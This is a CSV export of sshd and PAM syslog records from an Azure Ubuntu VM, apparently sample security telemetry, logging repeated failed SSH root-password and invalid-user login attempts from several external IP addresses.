+14102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:05,UbuntuDevEnv,2019-06-26 04:53:05,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34743 ssh2,2358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34743,,
+14103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:05,UbuntuDevEnv,2019-06-26 04:53:05,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 34743 ssh2 [preauth],2358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34743,,
+14104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:05,UbuntuDevEnv,2019-06-26 04:53:05,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:05,UbuntuDevEnv,2019-06-26 04:53:05,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 34743: Too many authentication failures [preauth],2358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,34743,,
+14106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:05,UbuntuDevEnv,2019-06-26 04:53:05,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:07,UbuntuDevEnv,2019-06-26 04:53:06,auth,UbuntuDevEnv,info,Failed password for invalid user she from 95.216.195.95 port 58320 ssh2,2414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,she,95.216.195.9,58320,,
+14108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:07,UbuntuDevEnv,2019-06-26 04:53:06,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 58320:11: Bye Bye [preauth],2414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,58320,,
+14109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:07,UbuntuDevEnv,2019-06-26 04:53:06,auth,UbuntuDevEnv,info,Disconnected from invalid user she 95.216.195.95 port 58320 [preauth],2414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,she,95.216.195.9,58320,,
+14110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:08,UbuntuDevEnv,2019-06-26 04:53:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:10,UbuntuDevEnv,2019-06-26 04:53:09,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 40289 ssh2,2429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,40289,,
+14112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:15,UbuntuDevEnv,2019-06-26 04:53:12,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 40289 ssh2,2429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,40289,,
+14113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:15,UbuntuDevEnv,2019-06-26 04:53:14,auth,UbuntuDevEnv,info,Invalid user abah from 200.6.188.38 port 48885,2462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abah,200.6.188.3,48885,,
+14114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:15,UbuntuDevEnv,2019-06-26 04:53:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:15,UbuntuDevEnv,2019-06-26 04:53:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,2462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+14116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:15,UbuntuDevEnv,2019-06-26 04:53:15,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 40289 ssh2,2429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,40289,,
+14117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:17,UbuntuDevEnv,2019-06-26 04:53:16,auth,UbuntuDevEnv,info,Failed password for invalid user abah from 200.6.188.38 port 48885 ssh2,2462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abah,200.6.188.3,48885,,
+14118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:17,UbuntuDevEnv,2019-06-26 04:53:16,auth,UbuntuDevEnv,info,Disconnected from invalid user abah 200.6.188.38 port 48885 [preauth],2462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abah,200.6.188.3,48885,,
+14119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:17,UbuntuDevEnv,2019-06-26 04:53:16,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 48885:11: Bye Bye [preauth],2462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,48885,,
+14120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:17,UbuntuDevEnv,2019-06-26 04:53:17,auth,UbuntuDevEnv,info,Invalid user ftp from 119.123.240.8 port 40498,2468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,119.123.240.8,40498,,
+14121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:17,UbuntuDevEnv,2019-06-26 04:53:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,2468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+14122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:17,UbuntuDevEnv,2019-06-26 04:53:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:18,UbuntuDevEnv,2019-06-26 04:53:18,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 40289 ssh2,2429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,40289,,
+14124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:19,UbuntuDevEnv,2019-06-26 04:53:19,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 119.123.240.8 port 40498 ssh2,2468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,119.123.240.8,40498,,
+14125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:20,UbuntuDevEnv,2019-06-26 04:53:19,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 40498:11: Bye Bye [preauth],2468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,40498,,
+14126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:20,UbuntuDevEnv,2019-06-26 04:53:19,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp 119.123.240.8 port 40498 [preauth],2468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,119.123.240.8,40498,,
+14127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:20,UbuntuDevEnv,2019-06-26 04:53:20,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 40289 ssh2,2429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,40289,,
+14128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:23,UbuntuDevEnv,2019-06-26 04:53:23,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:23,UbuntuDevEnv,2019-06-26 04:53:23,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:23,UbuntuDevEnv,2019-06-26 04:53:23,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 40289 ssh2,2429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,40289,,
+14131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:23,UbuntuDevEnv,2019-06-26 04:53:23,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 40289: Too many authentication failures [preauth],2429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,40289,,
+14132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:23,UbuntuDevEnv,2019-06-26 04:53:23,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 40289 ssh2 [preauth],2429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,40289,,
+14133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:26,UbuntuDevEnv,2019-06-26 04:53:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:28,UbuntuDevEnv,2019-06-26 04:53:28,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 45616 ssh2,2501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,45616,,
+14135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:41,UbuntuDevEnv,2019-06-26 04:53:41,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:41,UbuntuDevEnv,2019-06-26 04:53:41,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 45616 ssh2],2501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,45616,,
+14137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:41,UbuntuDevEnv,2019-06-26 04:53:41,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 45616: Too many authentication failures [preauth],2501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,45616,,
+14138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:41,UbuntuDevEnv,2019-06-26 04:53:41,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:41,UbuntuDevEnv,2019-06-26 04:53:41,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 45616 ssh2 [preauth],2501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,45616,,
+14140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:44,UbuntuDevEnv,2019-06-26 04:53:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:53:46,UbuntuDevEnv,2019-06-26 04:53:46,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 50755 ssh2,2562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50755,,
+14142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:00,UbuntuDevEnv,2019-06-26 04:53:59,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:00,UbuntuDevEnv,2019-06-26 04:53:59,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 50755 ssh2 [preauth],2562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50755,,
+14144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:00,UbuntuDevEnv,2019-06-26 04:53:59,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 50755: Too many authentication failures [preauth],2562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,50755,,
+14145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:00,UbuntuDevEnv,2019-06-26 04:53:59,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 50755 ssh2],2562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50755,,
+14146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:00,UbuntuDevEnv,2019-06-26 04:53:59,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:03,UbuntuDevEnv,2019-06-26 04:54:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:04,UbuntuDevEnv,2019-06-26 04:54:04,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56195 ssh2,2627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56195,,
+14149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:07,UbuntuDevEnv,2019-06-26 04:54:06,auth,UbuntuDevEnv,info,Invalid user nodeserver from 119.123.240.8 port 44009,2647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nodeserver,119.123.240.8,44009,,
+14150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:07,UbuntuDevEnv,2019-06-26 04:54:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,2647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+14151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:07,UbuntuDevEnv,2019-06-26 04:54:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:08,UbuntuDevEnv,2019-06-26 04:54:07,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56195 ssh2,2627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56195,,
+14153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:10,UbuntuDevEnv,2019-06-26 04:54:09,auth,UbuntuDevEnv,info,Failed password for invalid user nodeserver from 119.123.240.8 port 44009 ssh2,2647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nodeserver,119.123.240.8,44009,,
+14154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:10,UbuntuDevEnv,2019-06-26 04:54:10,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 44009:11: Bye Bye [preauth],2647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,44009,,
+14155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:10,UbuntuDevEnv,2019-06-26 04:54:10,auth,UbuntuDevEnv,info,Disconnected from invalid user nodeserver 119.123.240.8 port 44009 [preauth],2647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nodeserver,119.123.240.8,44009,,
+14156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:10,UbuntuDevEnv,2019-06-26 04:54:10,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56195 ssh2,2627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56195,,
+14157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:19,UbuntuDevEnv,2019-06-26 04:54:18,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:19,UbuntuDevEnv,2019-06-26 04:54:18,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 56195 ssh2 [preauth],2627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56195,,
+14159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:19,UbuntuDevEnv,2019-06-26 04:54:18,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 56195: Too many authentication failures [preauth],2627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,56195,,
+14160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:19,UbuntuDevEnv,2019-06-26 04:54:18,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
